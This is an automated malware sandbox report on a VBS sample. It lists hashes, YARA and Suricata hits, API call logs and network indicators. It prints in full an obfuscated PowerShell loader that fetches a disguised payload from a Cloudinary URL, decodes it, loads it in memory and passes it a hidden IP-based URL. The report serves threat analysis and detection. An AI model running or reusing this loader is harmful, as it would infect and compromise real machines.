Summary | ZeroBOX

comonstraints.vbs

Generic Malware Antivirus Malicious Library PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Jan. 12, 2025, 2:32 p.m. Jan. 12, 2025, 3:08 p.m.
Size 217.8KB
Type UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5 3f691c4d5e1b53d16964d30e35863f77
SHA256 a666a99f2056082802f459f7180f891582a527324a16d34b4755ed63e5467882
CRC32 E37EDC4B
ssdeep 3072:A8gVmI3b0mgfmWu+ce9VOv5iG5sVhQ30Wk+70wgA1A:A8gVve9VOvM
Yara
  • Malicious_Library_Zero - Malicious_Library
  • Antivirus - Contains references to security software

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\comonstraints.vbs

    2568
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"

      2648

IP Address Status Action
164.124.101.2 Active Moloch
23.46.236.45 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49164 -> 23.46.236.45:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49164
23.46.236.45:443
C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 C=IL, L=Petah Tikva, O=Cloudinary Ltd, CN=*.cloudinary.com 3c:38:41:3e:81:35:9e:7e:6d:34:b2:e4:fb:e2:0b:55:e7:bc:5d:73

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The remote server retur
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ned an error: (401) Unauthorized."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:614
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [vo
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: id]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not avai
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: lable' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version N
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ot available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredTex
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: t = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.co
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: m/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: Object System.Net.WebClient;$altiplano = $demayne.DownloadData <<<< ($unshatter
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: able);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentan
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: es = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.I
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarett
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: e = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarett
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: e);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$min
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: dfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home]
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: .GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lapplan
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: d', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','La
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: ppland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVers
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: ionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVe
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: rsion } else { Write-Output 'PowerShell version Not available' };if ($null -ne
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTab
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: le.PSVersion } else { Write-Output 'PowerShell version Not available' };
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: At line:1 char:679
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: + if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [vo
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: id]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not avai
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: lable' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: ) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version N
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: ot available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredTex
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: t = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.co
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: m/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-
console_handle: 0x000001f3
1 1 0

WriteConsoleW

buffer: Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);
console_handle: 0x000001ff
1 1 0

WriteConsoleW

buffer: $medine = [System.Text.Encoding]::UTF8.GetString <<<< ($altiplano);$spiropentan
console_handle: 0x0000020b
1 1 0

WriteConsoleW

buffer: es = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.I
console_handle: 0x00000217
1 1 0

WriteConsoleW

buffer: ndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -
console_handle: 0x00000223
1 1 0

WriteConsoleW

buffer: ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarett
console_handle: 0x0000022f
1 1 0

WriteConsoleW

buffer: e = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarett
console_handle: 0x0000023b
1 1 0

WriteConsoleW

buffer: e);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($
console_handle: 0x00000247
1 1 0

WriteConsoleW

buffer: candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$min
console_handle: 0x00000253
1 1 0

WriteConsoleW

buffer: dfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home]
console_handle: 0x0000025f
1 1 0

WriteConsoleW

buffer: .GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lapplan
console_handle: 0x0000026b
1 1 0

WriteConsoleW

buffer: d', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','La
console_handle: 0x00000277
1 1 0

WriteConsoleW

buffer: ppland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVers
console_handle: 0x00000283
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569c50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569c50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569c50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569c50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569c50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569c50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569950
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00569d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0637c7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0637c7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0637c7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0637c7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0637c7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0637c7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg
request GET https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 720896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0265a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02633000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02634000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02652000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02635000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0265c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02636000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02653000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02654000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02655000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02656000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02657000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02658000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02659000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b35000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b36000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b37000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b39000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b3a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b3b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

